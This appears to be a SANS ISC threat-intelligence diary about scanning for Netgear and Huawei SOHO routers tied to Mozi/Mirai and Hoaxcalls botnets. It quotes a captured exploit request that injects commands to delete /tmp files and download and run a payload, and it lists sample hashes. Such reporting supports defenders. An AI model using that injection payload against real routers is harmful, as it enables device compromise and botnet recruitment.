Scanning for SOHO Routers

Published: 2020-10-03
Last Updated: 2020-10-03 20:19:49 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

In the past 30 days lots of scanning activity looking for small office and home office (SOHO) routers targeting Netgear.

20201002-165049: data 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n'

Sampling multiple Mozi.a and Mozi.m files, analysis of each samples indicates if successful, it would attempt to connect the router to the Mirai botnet.

However, one of the file samples (Astra.mpsl) recovered was never submitted to Virustotal or any other sandbox and remained unidentified. Based on the information contained in the file, it is targeting the Huawei Home Gateway. One of the tell tale in the binary is the following string: 'Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS' which likely indicate it would connect the router to the Hoaxcalls Botnet.

This is part of the content of Astra.mpsl which shows it the targeted router is Huawei Home Gateway.

Suspicious Files and Scripts: Mozi.a/m (Mirai Botnet)


Suspicious Files and Scripts: (Hoaxcalls Botnet)
98eaa9a34533606924911ef15162102f  Astra.mpsl
cf6b4ccfc0414297a8a31c9349b6c3c246716829d4a15f3a2d3deae10bc2efde  Astra.mpsl

Indicators of Compromised


SOHO Active Scanners


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 comment(s)


Diary Archives